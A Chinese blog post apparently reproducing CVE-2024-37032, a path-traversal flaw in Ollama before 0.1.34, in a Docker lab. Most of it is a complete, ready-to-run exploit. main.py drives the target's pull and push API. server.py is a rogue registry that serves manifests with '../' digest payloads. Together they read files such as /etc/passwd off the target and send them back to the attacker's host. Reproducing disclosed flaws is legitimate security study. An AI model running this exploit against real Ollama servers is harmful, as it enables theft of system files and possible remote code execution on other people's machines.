CVE-2024-37032-Ollama漏洞

简介

Ollama是一个专为在本地环境中运行和定制大型语言模型而设计的工具。它提供了一个简单高效的接口,用于创建、运行和管理这些模型,同时还提供了一个丰富的预构建模型库,可以轻松集成到各种应用程序中。Ollama的目标是使大型语言模型的部署和交互变得简单,无论是对于开发者还是对于终端用户。

漏洞概述

漏洞编号:CVE-2024-37032 该漏洞允许通过路径遍历任意写入文件。digest字段的验证不正确,服务器错误地将有效负载解释为合法的文件路径,攻击者可在digest字段中包含路径遍历payload的恶意清单文件,利用该漏洞实现任意文件读取/写入或导致远程代码执行。

影响版本

Ollama < 0.1.34

环境搭建

在docker里面设置/etc/docker/daemon.json文件,可供拉取国外镜像(没有可新建)

{

  "registry-mirrors": [

    "https://registry.docker-cn.com",

    "http://hub-mirror.c.163.com",

    "https://dockerhub.azk8s.cn",

    "https://mirror.ccs.tencentyun.com",

    "https://registry.cn-hangzhou.aliyuncs.com",

    "https://docker.mirrors.ustc.edu.cn",

    "https://docker.m.daocloud.io",   

    "https://noohub.ru",

    "https://huecker.io",

    "https://dockerhub.timeweb.cloud"

  ]

}

好消息docker镜像可以使用了

拉取docker镜像

docker run -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.33

发现版本存在漏洞

python3 main.py --file 'etc/hosts' --target 192.168.16.135 --namespace 'mem/test' --host 192.168.16.135

python3 main.py --file 'etc/passwd' --target 192.168.16.135 --namespace 'mem/test' --host 192.168.16.135

对比文件

main.py


import threading

from time import sleep

import requests

import uvicorn

import argparse

from server import create_app

import socket

SLEEP_TIME = 0.5

def get_machine_ip():

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    try:

        s.connect(("8.8.8.8", 80))

        ip = s.getsockname()[0]

    except Exception:

        ip = "127.0.0.1"

    finally:

        s.close()

    return ip

def run_server(file, host, namespace):

    app = create_app(file, host, namespace)

    uvicorn.run(app, host='0.0.0.0', port=80)

if __name__ == "__main__":

    parser = argparse.ArgumentParser(description="Run FastAPI rogue server and exploit script (CVE-2024-37032).")

    parser.add_argument("--file", type=str, required=True, help="The file to read remotely.")

    parser.add_argument("--target", type=str, required=True, help="The vulnerable Ollama instance's (target) IP.")

    parser.add_argument("--target-ip", type=str, required=False, default=11434, help="The vulnerablr Ollama instance's (target) port.")

    parser.add_argument("--host", type=str, required=False, help="Current (attacker) machine's IP.")

    parser.add_argument("--namespace", type=str, required=False, default='vsociety/test', help="The string for the rogue registry namespace.")

    args = parser.parse_args()

    host = args.host or get_machine_ip()

    target_url = f"http://{args.target}:{args.target_ip}"

    file = args.file.lstrip("/")

    # Start the server in a new thread

    server_thread = threading.Thread(target=run_server, args=(file, host, args.namespace))

    server_thread.daemon = True

    server_thread.start()

    # Give the server a moment to start

    sleep(SLEEP_TIME)

    vuln_registry_url = f"{host}/{args.namespace}"

    pull_url = f"{target_url}/api/pull"

    push_url = f"{target_url}/api/push"

    # Now proceed with the requests

    requests.post(pull_url, json={"name": vuln_registry_url, "insecure": True})

    sleep(SLEEP_TIME)

    requests.post(push_url, json={"name": vuln_registry_url, "insecure": True})

    # Join the server thread if you want to wait for the server to finish (optional)

    server_thread.join()

server.py


from fastapi import FastAPI, Request, Response

PATH_TRAVELSAL_STRING = 14

PREFIX = "../" * PATH_TRAVELSAL_STRING

UUID = "3647298c-9588-4dd2-9bbe-0539533d2d04"

STATE = "eBQ2_sxwOJVy8DZMYYZ8wA8NBrJjmdINFUMM6uEZyYF7Ik5hbWUiOiJyb2d1ZS9sbGFtYTMiLCJVVUlEIjoiMzY0NzI5OGMtOTU4OC00ZGQyLTliYmUtMDUzOTUzM2QyZDA0IiwiT2Zmc2V0IjowLCJTdGFydGVkQXQiOiIyMDI0LTA2LTI1VDEzOjAxOjExLjU5MTkyMzgxMVoifQ%3D%3D"

def create_app(file: str, host: str, namespace: str):

    app = FastAPI()

    def write_to_file(text):

        try:

            with open('response.txt', 'w') as file_to_write:

                file_to_write.write(text)

            print(f"Content of {file} successfully written to response.txt.")

        except IOError:

            print(f"Error: Could not write to response.txt.")

    @app.get("/")

    async def index_get():

        return {"message": "Hello!"}

    @app.post("/")

    async def index_post(callback_data: Request):

        #print(await callback_data.body())

        return {"message": "Hello!"}

    # PULL

    @app.get(f"/v2/{namespace}/manifests/latest")

    async def fake_manifests():

        return {

            "schemaVersion": 2,

            "mediaType": "application/vnd.docker.distribution.manifest.v2+json",

            "config": {

                "mediaType": "application/vnd.docker.container.image.v1+json",

                "digest": f"{PREFIX}{file}",

                "size": 10

            },

            "layers":[

                {

                    "mediaType":"application/vnd.ollama.image.license",

                    "digest":f"{PREFIX}tmp/notfoundfile",

                    "size":10

                },

                {

                    "mediaType":"application/vnd.docker.distribution.manifest.v2+json",

                    "digest":f"{PREFIX}{file}",

                    "size":10

                },

                {

                    "mediaType":"application/vnd.ollama.image.license",

                    "digest":f"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest",

                    "size":10

                }

            ]

        }

    

    @app.head(f"/{file}")

    async def fake_head(response: Response):

        response.headers["Docker-Content-Digest"] = f"{PREFIX}{file}"

        return ''

    @app.get(f"/{file}", status_code=206)

    async def fake_get(response: Response):

        response.headers["Docker-Content-Digest"] = f"{PREFIX}{file}"

        response.headers["E-Tag"] = f"\"{PREFIX}{file}\""

        return 'test'

    @app.head(f"/root/.ollama/models/manifests/{host}/{namespace}/latest")

    async def fake_latest_head(response: Response):

        response.headers["Docker-Content-Digest"] = f"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest"

        return ''

    @app.get(f"/root/.ollama/models/manifests/{host}/{namespace}/latest", status_code=206)

    async def fake_latest_get(response: Response):

        response.headers["Docker-Content-Digest"] = f"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest"

        response.headers["E-Tag"] = f"\"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest\""

        return {

            "schemaVersion": 2,

            "mediaType": "application/vnd.docker.distribution.manifest.v2+json",

            "config": {

                "mediaType": "application/vnd.docker.container.image.v1+json",

                "digest": f"{PREFIX}{file}",

                "size": 10

            },

             "layers":[

                {

                    "mediaType":"application/vnd.ollama.image.license",

                    "digest":f"{PREFIX}tmp/notfoundfile",

                    "size":10

                },

                {

                    "mediaType":"application/vnd.docker.distribution.manifest.v2+json",

                    "digest":f"{PREFIX}{file}",

                    "size":10

                },

                {

                    "mediaType":"application/vnd.ollama.image.license",

                    "digest":f"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest",

                    "size":10

                }

            ]

        }

    @app.head("/tmp/notfoundfile")

    async def fake_notfound_head(response: Response):

        response.headers["Docker-Content-Digest"] = f"{PREFIX}tmp/notfoundfile"

        return ''

    @app.get("/tmp/notfoundfile", status_code=206)

    async def fake_notfound_get(response: Response):

        response.headers["Docker-Content-Digest"] = f"{PREFIX}tmp/notfoundfile"

        response.headers["E-Tag"] = f"\"{PREFIX}tmp/notfoundfile\""

        return ''

    # PUSH

    @app.post(f"/v2/{namespace}/blobs/uploads/", status_code=202)

    async def fake_upload_post(callback_data: Request, response: Response):

        #print(await callback_data.body())

        response.headers["Docker-Upload-Uuid"] = UUID

        response.headers["Location"] = f"http://{host}/v2/{namespace}/blobs/uploads/{UUID}?_state={STATE}"

        return ''

    @app.patch(f"/v2/{namespace}/blobs/uploads/{UUID}", status_code=202)

    async def fake_patch_file(callback_data: Request):

        body = await callback_data.body()

        decoded_body = body.decode("utf-8")

        pretty_body = decoded_body.replace("\n", "\n")

        print(pretty_body)

        print("Writing response to file...")

        write_to_file(pretty_body)

        return ''

    @app.post(f"/v2/{namespace}/blobs/uploads/{UUID}", status_code=202)

    async def fake_post_file(callback_data: Request):

        #print(await callback_data.body())

        return ''

    @app.put(f"/v2/{namespace}/manifests/latest")

    async def fake_manifests_put(callback_data: Request, response: Response):

        #print(await callback_data.body())

        response.headers["Docker-Upload-Uuid"] = UUID

        response.headers["Location"] = f"http://{host}/v2/{namespace}/blobs/uploads/{UUID}?_state={STATE}"

        return ''

    return app

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值